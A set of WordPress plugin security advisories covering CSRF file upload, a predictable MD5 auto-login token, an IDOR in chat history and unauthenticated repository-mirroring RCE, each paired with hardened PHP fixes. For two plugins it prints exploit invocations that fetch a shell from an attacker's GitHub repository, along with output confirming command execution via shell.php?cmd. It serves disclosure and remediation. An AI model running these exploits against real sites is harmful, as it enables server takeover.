The Bread & Butter IO plugin's image upload functionality is vulnerable to cross-site request forgery (CSRF): an attacker who can get an authenticated administrator to visit a page they control can make that administrator's browser upload arbitrary files, including PHP web shells, to the server, leading to remote code execution (RCE). The root cause is that the uploadImage() function performs no CSRF check, so a forged request that carries the administrator's session cookies is accepted as if the administrator had made it.
The vulnerability exists in the uploadImage() function in /bread-butter/src/Base/Ajax.php, which performs neither file validation nor a CSRF check and writes the uploaded content directly into the WordPress uploads directory with file_put_contents() before any security check runs.
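To make the two defects concrete, here is an AJAX image-upload handler written two ways. This is an added illustration, not the Bread & Butter IO plugin's code: the first function reproduces the pattern the advisory describes (no nonce, no capability check, raw write before any validation), the second is the hardened form. The function and action names (bb_upload_image_*), the nonce action name and the request field names (image, nonce) are assumptions; the code runs inside WordPress.

```php
<?php
// Added illustration (not the Bread & Butter IO plugin's code). Names such as
// bb_upload_image_* and the 'image'/'nonce' request fields are assumptions.

// --- Vulnerable pattern: no nonce, no capability check, write before validation ---
function bb_upload_image_vulnerable() {
    $upload_dir = wp_upload_dir();
    $name = basename($_FILES['image']['name']);              // attacker controls name and extension
    $dest = trailingslashit($upload_dir['path']) . $name;
    // Content lands on disk first; any check added after this line is too late.
    file_put_contents($dest, file_get_contents($_FILES['image']['tmp_name']));
    wp_send_json_success(['url' => trailingslashit($upload_dir['url']) . $name]);
}
add_action('wp_ajax_bb_upload_image_vulnerable', 'bb_upload_image_vulnerable');

// --- Hardened form ---
function bb_upload_image_hardened() {
    // 1. CSRF: the request must carry a nonce an attacker's page cannot read.
    check_ajax_referer('bb_upload_image', 'nonce');          // sends 403 and dies on failure

    // 2. Authorisation: wp_ajax_ hooks only require a login; demand the capability.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('insufficient privileges', 403);
    }

    if (empty($_FILES['image']['tmp_name']) || !is_uploaded_file($_FILES['image']['tmp_name'])) {
        wp_send_json_error('no file', 400);
    }

    // 3. Validate before writing: extension and sniffed MIME type must agree and
    //    both must be on the image allowlist, so "shell.php" or "x.php.png" fail here.
    $allowed = [
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'png'  => 'image/png',
        'gif'  => 'image/gif',
        'webp' => 'image/webp',
    ];
    $check = wp_check_filetype_and_ext(
        $_FILES['image']['tmp_name'],
        sanitize_file_name($_FILES['image']['name']),
        $allowed
    );
    if (empty($check['ext']) || empty($check['type']) || !isset($allowed[$check['ext']])) {
        wp_send_json_error('file type not allowed', 415);
    }

    // 4. Let core move the file: it re-checks the type against 'mimes',
    //    sanitizes the name and never honours a client-supplied path.
    $result = wp_handle_upload($_FILES['image'], [
        'test_form' => false,
        'mimes'     => $allowed,
    ]);
    if (isset($result['error'])) {
        wp_send_json_error($result['error'], 400);
    }
    wp_send_json_success(['url' => $result['url']]);
}
add_action('wp_ajax_bb_upload_image_hardened', 'bb_upload_image_hardened');
```

The nonce has to be minted server-side with wp_create_nonce('bb_upload_image') and sent with the request by the plugin's own JavaScript; a cross-origin attacker cannot read it, which is what defeats the forged request. The capability check is separate and still matters: without it any logged-in subscriber could reach the handler.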
The WP Directory Kit plugin for WordPress, version 1.4.4 and below, contains an authentication bypass in its auto-login functionality. The vulnerability allows unauthenticated attackers to gain administrative access to WordPress sites by exploiting a cryptographically broken token generation mechanism. The auto-login feature cannot be disabled and uses a predictable token derived solely from the MD5 hash of the user ID, so anyone who knows or guesses a user ID can compute the token without any secret from the site.
TL;DR Exploits
The CVE-2025-13390.sh script uploads a web shell plugin to a target site, assuming user ID 1 is an administrator.
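The following is an added illustration, not WP Directory Kit's code, of why a token that is a pure function of the user ID is forgeable and what an unguessable auto-login token looks like. It runs with the php CLI; the in-memory $store array stands in for a database table or WordPress transient, and the function names are assumptions.

```php
<?php
// Added illustration (not WP Directory Kit's code). $store stands in for a
// database table or transient; function names are assumptions.

function check(bool $ok, string $what): void {
    if (!$ok) { throw new RuntimeException("FAILED: $what"); }
}

// The broken scheme as the advisory describes it: no secret, no randomness,
// so the "token" is a pure function of public data.
function predictable_token(int $user_id): string {
    return md5((string) $user_id);
}

// An attacker needs nothing from the site: guess a user ID, hash it.
$forged = md5('1');                                   // c4ca4238a0b923820dcc509a6f75849b
check($forged === predictable_token(1), 'md5(user_id) is reproducible offline');

// Hardened scheme: 256 bits from a CSPRNG, stored only as a hash, bound to
// the user, short-lived and consumed on first use.
$store = [];   // sha256(token) => ['user_id' => int, 'expires' => int]

function issue_login_token(array &$store, int $user_id, int $ttl = 300): string {
    $token = bin2hex(random_bytes(32));
    $store[hash('sha256', $token)] = [
        'user_id' => $user_id,
        'expires' => time() + $ttl,
    ];
    return $token;   // delivered out of band (e.g. an emailed link); not derivable from the ID
}

function redeem_login_token(array &$store, string $token): ?int {
    if (!preg_match('/^[0-9a-f]{64}$/', $token)) {
        return null;                                  // malformed: reject before hashing
    }
    $key = hash('sha256', $token);
    if (!isset($store[$key])) {
        return null;                                  // unknown token, which covers every forgery
    }
    $record = $store[$key];
    unset($store[$key]);                              // single use, consumed even if expired
    if ($record['expires'] < time()) {
        return null;
    }
    return $record['user_id'];
}

$t = issue_login_token($store, 1);
check(redeem_login_token($store, $t) === 1,        'fresh token logs in user 1');
check(redeem_login_token($store, $t) === null,     'replayed token is rejected');
check(redeem_login_token($store, md5('1')) === null, 'the old md5 forgery is just an unknown string');
check(redeem_login_token($store, bin2hex(random_bytes(32))) === null, 'random guess fails');

$expired = issue_login_token($store, 1, -1);        // already past its expiry
check(redeem_login_token($store, $expired) === null, 'expired token is rejected');
echo "all checks passed\n";
```

Inside WordPress the store would be a transient keyed on the token hash with the TTL as its expiry, and a successful redeem would call wp_set_current_user() and wp_set_auth_cookie(). Independently of the token design, an auto-login feature of this kind should be opt-in and switchable off, since the advisory notes that the vulnerable one cannot be disabled.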
The MxChat Basic plugin does not verify session ownership in the mxchat_fetch_conversation_history AJAX endpoint, an Insecure Direct Object Reference (IDOR) that allows unauthenticated users to read other users' conversation history and IP addresses.
The mxchat_fetch_conversation_history() function in /includes/class-mxchat-integrator.php retrieves conversation data based solely on a client-provided session_id, without verifying that the requester owns the session. This allows any unauthenticated user with a valid nonce (which is exposed in the public front-end JavaScript, so it proves nothing about who is asking) to access other users' private conversation data. Additionally, the conversation history includes user IP addresses stored in the agent_name field, which are disclosed alongside the conversation data.
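Here is an added illustration, not MxChat's code, of the ownership check the endpoint lacks. The table and column names (mxchat_sessions, mxchat_messages, owner_id, owner_token), the cookie name and the action names are assumptions; the shape of the check is the point. It runs inside WordPress.

```php
<?php
// Added illustration (not MxChat's code). Table, column, cookie and action
// names are assumptions.

function mxchat_owner_token(): string {
    // Random 256-bit value set in a cookie when the visitor's session was created.
    return isset($_COOKIE['mx_owner']) ? (string) $_COOKIE['mx_owner'] : '';
}

function fetch_history_hardened() {
    global $wpdb;
    // The nonce proves the request came from the site's own front end, but that
    // front end is public, so it says nothing about *which* visitor is asking.
    check_ajax_referer('mxchat_history', 'nonce');

    $session_id = isset($_POST['session_id'])
        ? sanitize_text_field(wp_unslash($_POST['session_id']))
        : '';
    if ($session_id === '') {
        wp_send_json_error('missing session', 400);
    }

    $session = $wpdb->get_row($wpdb->prepare(
        "SELECT owner_id, owner_token FROM {$wpdb->prefix}mxchat_sessions WHERE session_id = %s",
        $session_id
    ));

    // Deny unless the caller proves ownership: either the logged-in user who
    // created the session, or a visitor holding that session's secret cookie.
    $owns = $session !== null && (
        ((int) $session->owner_id > 0 && (int) $session->owner_id === get_current_user_id())
        || ((string) $session->owner_token !== ''
            && hash_equals((string) $session->owner_token, mxchat_owner_token()))
    );
    if (!$owns) {
        // Same response whether the session is missing or belongs to someone
        // else, so the endpoint cannot be used to enumerate valid session IDs.
        wp_send_json_error('not found', 404);
    }

    $rows = $wpdb->get_results($wpdb->prepare(
        "SELECT role, message, created_at FROM {$wpdb->prefix}mxchat_messages
         WHERE session_id = %s ORDER BY created_at",
        $session_id
    ));
    // Return only what the UI needs: no IP address, no agent_name field.
    wp_send_json_success($rows);
}
add_action('wp_ajax_mxchat_fetch_history', 'fetch_history_hardened');
add_action('wp_ajax_nopriv_mxchat_fetch_history', 'fetch_history_hardened');
```

Two design points carry the fix: the session row records who created it, and the response for "wrong owner" is indistinguishable from "no such session". Selecting only the columns the UI needs also removes the IP disclosure even if the agent_name field keeps being populated elsewhere.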
The AI Feeds WordPress plugin, versions 1.0.11 and below, contains an unauthenticated remote code execution vulnerability in the actualizador_git.php file. This file is directly accessible via HTTP without any authentication or authorization checks, allowing unauthenticated attackers to fetch an attacker-chosen GitHub repository and overwrite the plugin's files with its contents, leading to remote code execution.
TL;DR Exploits
A CVE-2025-13597.py script is provided to demonstrate a remote attacker uploading shell.php and executing commands on the server:
python3 CVE-2025-13597.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...   [Downloading d0n601/minimal-rce@main ...]
Eliminando entradas extra...   [Removing extra entries...]
Copiando archivos...   [Copying files...]
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/ai-feeds   [OK. Mirror applied to: /var/www/html/wp-content/plugins/ai-feeds]
[*] Exploit executed. Checking if shell.php was created...
[*] Testing shell access...
www-data
[*] Shell should be accessible at:
http://techcorp.cc/wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND
Technical Analysis
The vulnerability exists in /wp-content/plugins/ai-feeds/actualizador_git.php. This file implements a GitHub repository mirroring routine that runs whenever the file is requested directly over HTTP, with no authentication, nonce or capability check in front of it.
The Cibeles AI WordPress plugin, versions 1.10.8 and below, contains an unauthenticated remote code execution vulnerability in the actualizador_git.php file. This file is directly accessible via HTTP without any authentication or authorization checks, allowing unauthenticated attackers to fetch an attacker-chosen GitHub repository and overwrite the plugin's files with its contents, leading to remote code execution.
TL;DR Exploits
A CVE-2025-13595.py script is provided to demonstrate a remote attacker uploading shell.php and executing commands on the server:
python3 CVE-2025-13595.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...   [Downloading d0n601/minimal-rce@main ...]
Eliminando entradas extra...   [Removing extra entries...]
Copiando archivos...   [Copying files...]
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/cibeles-ai   [OK. Mirror applied to: /var/www/html/wp-content/plugins/cibeles-ai]
[*] Exploit executed. Checking if shell.php was created...
[*] Testing shell access...
www-data
[*] Shell should be accessible at:
http://techcorp.cc/wp-content/plugins/cibeles-ai/shell.php?cmd=COMMAND
Technical Analysis
The vulnerability exists in /wp-content/plugins/cibeles-ai/actualizador_git.php. This file implements a GitHub repository mirroring routine that runs whenever the file is requested directly over HTTP, with no authentication, nonce or capability check in front of it.
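The AI Feeds and Cibeles AI findings share one root cause, a maintenance script that executes on any direct HTTP request, so a single added illustration covers both. It is not the plugins' code: it shows the direct-access guard such a file needs, and how a repository sync should be exposed if it must be reachable over HTTP at all. The function, option, hook and repository names (aifeeds_sync_repo, aifeeds_release_sha256, vendor-org/ai-feeds, the staging directory) are assumptions; the code runs inside WordPress.

```php
<?php
// Added illustration (not the AI Feeds or Cibeles AI plugin code). Function,
// option and repository names are assumptions.

// 1. Any file under wp-content/plugins that is only meant to be included by
//    the plugin must refuse direct requests. When the web server executes the
//    file on its own, WordPress is not loaded and ABSPATH is undefined.
if (!defined('ABSPATH')) {
    http_response_code(403);
    exit;
}

// 2. If the sync must be triggerable over HTTP, expose it as an admin-post
//    action gated on capability and nonce, never as a bare script.
function aifeeds_sync_repo(): void {
    if (!current_user_can('update_plugins')) {
        wp_die('insufficient privileges', '', ['response' => 403]);
    }
    check_admin_referer('aifeeds_sync_repo');   // dies on a missing or stale nonce

    // 3. Never take owner/repo/ref from the request. A caller who can choose
    //    the source repository chooses the PHP that ends up on disk.
    $owner = 'vendor-org';                       // assumed, pinned server-side
    $repo  = 'ai-feeds';
    $ref   = 'main';
    $url   = sprintf('https://codeload.github.com/%s/%s/zip/refs/heads/%s',
                     rawurlencode($owner), rawurlencode($repo), rawurlencode($ref));

    // 4. Stage and verify before touching the live plugin directory.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $tmp = download_url($url, 60);
    if (is_wp_error($tmp)) {
        wp_die(esc_html($tmp->get_error_message()));
    }
    // Hash published with the release and stored server-side, so a hijacked
    // repository or a tampered download cannot push arbitrary code.
    $expected = (string) get_option('aifeeds_release_sha256', '');
    if ($expected === '' || !hash_equals($expected, hash_file('sha256', $tmp))) {
        @unlink($tmp);
        wp_die('archive hash mismatch, refusing to install', '', ['response' => 409]);
    }

    WP_Filesystem();
    $staging = WP_PLUGIN_DIR . '/ai-feeds-staging';
    $result  = unzip_file($tmp, $staging);
    @unlink($tmp);
    if (is_wp_error($result)) {
        wp_die(esc_html($result->get_error_message()));
    }
    // From here the verified tree in $staging is swapped into place with a
    // directory rename rather than copied file by file, so a half-applied
    // update never serves a mix of old and new code.
    wp_safe_redirect(admin_url('plugins.php?aifeeds_synced=1'));
    exit;
}
add_action('admin_post_aifeeds_sync_repo', 'aifeeds_sync_repo');
```

Belt and braces: even with the guard in place, the web server can refuse the path outright (an Apache <Files "actualizador_git.php"> block with Require all denied, or an nginx location returning 403), which also protects sites that cannot update the plugin immediately. The hash check matters because "download from GitHub and copy over the plugin" is a supply-chain channel as well as an access-control one: whoever controls the fetched repository controls the code.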